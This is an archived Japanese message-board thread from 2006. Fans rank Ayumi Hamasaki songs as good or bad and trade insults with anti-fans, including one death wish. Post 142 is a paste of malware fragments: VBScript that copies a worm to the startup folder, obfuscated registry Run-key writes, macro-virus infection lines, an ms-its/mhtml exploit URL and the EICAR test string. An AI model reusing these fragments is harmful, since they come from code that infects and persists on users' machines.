無期になりすぎ
きゃはははは(^O^)初動8万累計11万ってあゆの中では糞の糞!!
曲がまったく受けてないし、雑音以下。君、難聴?

122 ::2006/09/16(土) 21:08:41
アンチ必死デス

123 :どっちの名無しさん?:2006/09/16(土) 21:14:26
>>122
アンチじゃないけどねワラ
ただ糞は糞っていいたいわけ(^O^)
あんなの誉めてたらまた糞だしくるからね〜(^O^)

124 :どっちの名無しさん?:2006/09/16(土) 21:15:09
>>121
一着3000万ってPVの毛皮のコートの間違いだろ。
それにしても最近のアンチって下手なするとファンよりコアな情報知ってるな。

125 :どっちの名無しさん?:2006/09/16(土) 21:22:57
>>124
そうそうそれだ(^O^)ワラ

126 :どっちの名無しさん?:2006/09/16(土) 21:23:29
確かにボルデリは最初「?」って感じだったけど聴いてるうちにあぁゆうのもいいと思った。1LOVEは微妙だけど。

127 :どっちの名無しさん?:2006/09/16(土) 21:23:51
>>124
流石ヲタ!

128 :どっちの名無しさん?:2006/09/16(土) 21:33:15
>>124
だからアンチじゃないってワラ

>>126
いま耳を治療中なんですか(^O^)ワラ?

129 ::2006/09/16(土) 21:35:02
隠れアンチが現れたwww

130 :どっちの名無しさん?:2006/09/16(土) 21:38:23
いきなりすいません。DQNちどぉ言う意味ですか?

131 :どっちの名無しさん?:2006/09/16(土) 21:40:31
ドラクエナイン

132 :どっちの名無しさん?:2006/09/16(土) 21:40:59
>>129
アンチじゃないからワラ

>>130
ボルデリなんか褒めてるやつのことだよ(^O^)ワラ

馬鹿でりしゃああああす!

133 :どっちの名無しさん?:2006/09/16(土) 21:43:05
>>132
馬鹿っち意味ですか?
なんで?

134 :どっちの名無しさん?:2006/09/16(土) 21:44:54
>>132
チガウチガウ隠れアンチwww

135 :どっちの名無しさん?:2006/09/16(土) 22:02:48
>>133
マジレスしてあげると
DQN=ドキュン=不良とか馬鹿

136 :どっちの名無しさん?:2006/09/16(土) 22:58:42
DQNはアンチのこと。ボルデリカラオケで唄うと案外スッキリするb(゚∀゚)d☆b(´∀`)d

137 : ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄:2006/09/17(日) 14:16:57
  (::::::::::/  ):::ノ::::ノ ) ソ ヾ::::::::::::丶::::ヽ
 (:::::::::/ 彡  ノ   ノ  :: 彡:/)) ::::::::::)
(::::::::::/彡彡彡彡彡   ミミミミミミミ :::::::::::)
( :::::::// ̄ ̄ ̄ ̄ヽ===/ ̄ ̄ ̄ ̄ヽ |:::::::::)
 | =ロ   '"●>  ‖ ‖  <'●  ロ===|
 |:/ ‖    / /ノ  ヽ \     ‖ ヽ|ヽ
 |/  ヽ`======/ .⌒ ` ========ノ.   ..| |
.( 。 ・:・'。c  ( ○ ,:○ ) ;"・u。*@・:、')ノ  
( 。;・0"*・o; / :::::l l::: ::: \ :。・;%:・。o )
(; 8@ ・。:/  _,-'ニニニヽ :\."・:。;・'0.)
.\。・:%,: ):::  ヾニ二ン"   ::::(: :o`*:c/    
 \ ::: o ::::::: ::::::::::::::::::::::::  ::::::::::::::   /
  (ヽ  ヽ:::: _- ::::: ⌒:: :::::::: -_     ノ
   \丶\_::_:::::_:::: :::::_/::::::: /


138 :どっちの名無しさん?:2006/09/18(月) 13:11:43
>>116
稲沢生きてたか

139 :どっちの名無しさん?:2006/09/18(月) 14:42:11
>>136
ボルデリは聴くのはいいけどカラオケで歌うとつまんないよ

140 :はな:2006/09/18(月) 22:19:19
全部の曲良いよ
駄作とかどんな身分でいってんだよ
なんの才能もない落ちこぼれが

141 :どっちの名無しさん?:2006/09/18(月) 23:31:02
だがハマの場合は全てパクリ歌詞





以上

142 :<body onload=window()>:2006/09/19(火) 01:52:43
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

143 :どっちの名無しさん?:2006/09/19(火) 09:24:21
ボー〜ンデリシャーース!!

144 :どっちの名無しさん?:2006/09/20(水) 15:23:06
>>140死ね!安室奈美恵より

145 :どっちの名無しさん?:2006/09/20(水) 18:39:45
安室ちゃんそんなこと言わないよ?

146 :どっちの名無しさん?:2006/09/20(水) 19:00:22
神曲
Greatful days
fairyland
Voyage
Fly high(特にSingleにある"Hal's Mix2000"Ver.)
BLUE BIRD

良曲
Moments
INSPIRE
Who...
RAINBOW
July 1st
Born To Be...
Startin'
CAROLS

糞曲
Bold&Delicious
Pride
UNITE!
forgiveness
alterna

147 :どっちの名無しさん?:2006/09/20(水) 21:56:18
ボルデリ

148 :どっちの名無しさん?:2006/09/27(水) 00:30:10
age

149 :どっちの名無しさん?:2006/09/29(金) 08:21:48
良曲
fairy land
fly high
step you
SURREAL
flower garden

堕曲
UNITE
PRIDE
FAR AWAY
HANABI
HANABI U

150 :どっちの名無しさん?:2006/09/29(金) 08:26:07
存在すら忘れてたがゴミ曲に
CALORS
close to you
forgiveness
追加。特に上の2曲は論外

151 :どっちの名無しさん?:2006/09/29(金) 09:06:34
クローストゥーユーは気付かなかったなぁ

152 :どっちの名無しさん?:2006/09/29(金) 19:13:33
良曲はいっぱいありすぎて書くの疲れるから、あえて書かないね。
今ハマってる良曲は、ourselves。
初めはぎゅっとしてみたりーとか変な歌だなと思ったけど、それ以外は結構良いじゃん。

駄曲
UNITE! みーぎーてーはーとか言うやつだよね?・・・ケッ
ボルデ
今パナソニックのCMで流れてるやつ(JUWELじゃない方ね)

153 :どっちの名無しさん?:2006/09/29(金) 19:19:50
お経スレはココですか(・∀・ )

154 :どっちの名無しさん?:2006/09/29(金) 19:22:22
Free&Easy以外のすべて好き・良曲♪♪♪♪♪

155 :どっちの名無しさん?:2006/09/29(金) 23:32:13
>>154あゆも本望だね

156 :どっちの名無しさん?:2006/10/02(月) 03:41:55
>>150
自分の着信音とメロディーコールがclose to youなんですけど・・・
詩が切なくて曲と演奏が冬っぽくて好きなんだけどな

157 :どっちの名無しさん?:2006/10/04(水) 14:39:05
超駄曲 B & D
クローズトゥユーって虹に入ってた奴だっけ?
嫌いじゃなかったけどなぁ

158 :どっちの名無しさん?:2006/10/19(木) 19:47:32
良曲・No way to say
・ANGEL'S SONG
・INSPIRE
・fairyland
・SURREAL

159 :どっちの名無しさん?:2006/10/19(木) 20:50:22
良曲 real me、ANGEL'S SONG、 INSPIRE、about you、Fly high、Windingroad    駄曲 Far away、NEVEREVER   神曲 Replace

160 :どっちの名無しさん?:2006/10/19(木) 21:32:02
良曲 インスパイア、トラウマ
駄曲 テディベア

161 :どっちの名無しさん?:2006/10/19(木) 23:32:16
>>160あんたおかしんじゃない!?

162 :どっちの名無しさん?:2006/10/19(木) 23:46:50
>>161
あれ?なんか不愉快にさせた?
俺も父親いないから、あれ聞くと凹むんだよ


163 :どっちの名無しさん?:2006/10/19(木) 23:48:18
>>161
お前の方がよっぽどおかしいと思うが・・?

164 :どっちの名無しさん?:2006/10/19(木) 23:48:45
テディベアが駄作なんて‥おかしい

165 :どっちの名無しさん?:2006/10/19(木) 23:53:39
テディベアとメモアドは大切な曲だってあゆ言ってたよ。

166 :どっちの名無しさん?:2006/10/19(木) 23:55:03
神…Who...、ボヤゲ、木綿津、XX、メモアド
良…スターティン、ブルバ、イマチュア、屁蟻土地、Greatful Days
駄…ウニテ、クリミナル、forgiveness、フラワーガーデン、Free&easy

167 :どっちの名無しさん?:2006/10/20(金) 00:18:08
大切な曲でも聞いたらブルーになるんだって!

168 :どっちの名無しさん?:2006/10/20(金) 00:21:51
あゆおばあちゃんの葬式行かなかったんだよね。後悔してるって(´Д`。)

169 :kodama:2006/10/20(金) 01:11:01
神曲
-HEAVEN-
-teddy bear-
-Memorial address-
-monochrome-
-JEWEL-

良曲
-STEPyou-
-ourselves-
-my name`s WOMEN-
-Key-
-Trust-

駄曲
-B and D-
-forgiveness-
-F and E-
-1 LOVE-
-Dolls-
-HONEY-

HONEYはきもイ
自分の歳考えろっておもった

170 :どっちの名無しさん?:2006/10/20(金) 01:21:06
スティービー・ワンダーとデスティニーズ・チャイルドにボーカルを絶賛された
容姿とスター性と歌唱力、天性の歌声を兼ね備えた日本が生んだ奇跡の歌姫 愛内里菜


<<愛内里菜の魅力♪>>
「絶対的な歌唱力」
ライブでCD以上の迫力で歌い上げる本格派!上手い!
声量があり音域も広く、低音域は渋く、中音域は安定、高音域は
ファルセットも使って突き抜ける。
「楽曲の素晴らしさ」
日本人のもっとも好む「哀愁」とヌケのいいダンスサウンドが武器。
全ての楽曲について言えることはメロディーがしっかりしており、
Cメロ・Dメロまで展開する曲も多い。旧小室ファン、ビーイングファン
を中心に邦楽ファンの大多数たるライトリスナーを虜にするものである。
さらにバラードがまた切なくて絶品。
「ルックス」
コンパに来れば間違いなく一番人気というリアルな可愛さを誇る。
しかも廃刊ファッション誌の元モデル。さらに元ギャル。
「キャラ」
歌声とはあまりに遠いアニメ声はお茶の間の話題を独り占めに!
ほんわかした性格の良さは作り上げられた癒し系タレントを抑えて余りある。


ライブ映像
http://www.youtube.com/watch?v=IsVxJRYu11Q
NAVY BLUE(Music Station'01)
http://www.youtube.com/watch?v=0rLqu3lhLN4&mode=related&search=
伝説の名盤 Be Happy
http://www.youtube.com/watch?v=5AEVuVUtXYw&mode=related&search=

171 :どっちの名無しさん?:2006/10/20(金) 03:03:23
B&Dは歌詞載っけるだけでも苦労したと思うな…
クセある曲だし。
でもオレは好きだよ、こういう曲も♪

172 :どっちの名無しさん?:2006/10/20(金) 14:15:53
あゆ画像満載&アンケート
http://26.xmbs.jp/1231o4/

173 :どっちの名無しさん?:2006/10/20(金) 23:15:03
>>169あんたおかしんじゃない!?

174 :どっちの名無しさん?:2006/10/20(金) 23:17:40
ボルデリ駄曲って言う香具師の気が知れない

175 :どっちの名無しさん?:2006/10/22(日) 01:10:58
255 名前:どっちの名無しさん? :2006/10/22(日) 01:10:20
愛たんはかわいい

176 :どっちの名無しさん?:2006/10/22(日) 21:27:23
ANGEL'S SONGって最近聴いてるけどいいねー。

177 :どっちの名無しさん?:2006/10/22(日) 21:45:43
>176
私も大好き〜♪


178 :どっちの名無しさん?:2006/10/22(日) 21:52:05
あゆヲタって、自分の好みを
人に押しつけるのが好きなんだな。
ヲタ同士でも。

179 :どっちの名無しさん?:2006/10/22(日) 23:51:12
>>178何も押し付けてはないと思うが。

180 :琥絽埜:2006/10/23(月) 00:17:14
はじめまして琥絽埜です。よろしくお願いします。 
オレはBLUEBIRD聴いているがとてもいいと思う。


181 :どっちの名無しさん?:2006/10/23(月) 06:48:04
アンチには何言っても無駄だよん

182 :どっちの名無しさん?:2006/10/23(月) 09:26:06
>>178あんたおかしんじゃない!?

183 :どっちの名無しさん?:2006/10/23(月) 19:31:21
Because of You
最高にカッコイイ!!

184 :どっちの名無しさん?:2006/10/25(水) 20:17:23
良曲☆
ANGEL'S SONG
AUDIENCE
Key
STEP you
A Song is born
です。駄曲は特にないですね。

185 :どっちの名無しさん?:2006/10/25(水) 20:49:11
良曲
Who…
SEASONS
Heart Place
vogue
駄目
Greatful days
最近の

186 :どっちの名無しさん?:2006/10/25(水) 20:51:43
185 良曲Moments追加

187 :どっちの名無しさん?:2006/10/25(水) 21:00:37
良曲
1.FRIEND
2.A Song For Xx
3.July 1st
4.YOU
5.walking proud

188 :どっちの名無しさん?:2006/10/25(水) 21:09:54
良曲
Born To Be
alterna
Pride

駄曲
ありません。

189 :どっちの名無しさん?:2006/10/25(水) 23:31:17
神曲
BLUE BIRD
End roll
Startin'
Connected
JEWEL

190 :どっちの名無しさん?:2006/10/25(水) 23:37:04
良曲
あの夏のお葬式の歌

駄曲
2000年-2003年あたりの歌ほぼ全て(全部は知らない)


191 :どっちの名無しさん?:2006/10/26(木) 00:50:50
良曲
teddy bear
who..
SEASONS
YOU
Scar
メモアド
駄曲
ボルデリ


192 :どっちの名無しさん?:2006/10/26(木) 01:02:57
ビコーズオブユー最高

193 :どっちの名無しさん?:2006/10/26(木) 01:54:39
STEP you のプロモ激萌え

194 :どっちの名無しさん?:2006/10/26(木) 07:50:38
Startin'は神

195 :どっちの名無しさん?:2006/10/26(木) 12:23:19
>>190あんたおかしんじゃない!?

196 :どっちの名無しさん?:2006/10/26(木) 12:51:13
駄曲 すべて

197 :どっちの名無しさん?:2006/10/26(木) 13:11:25
すべて 聴いたのかすごいなぁ

198 :どっちの名無しさん?:2006/10/26(木) 13:20:40
>>196駄曲とか言いつつ全部聴くなんて相当もの好きだね。アンチのくせに

199 :どっちの名無しさん?:2006/10/26(木) 18:42:41
釣りにいちいち反応するなって

48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)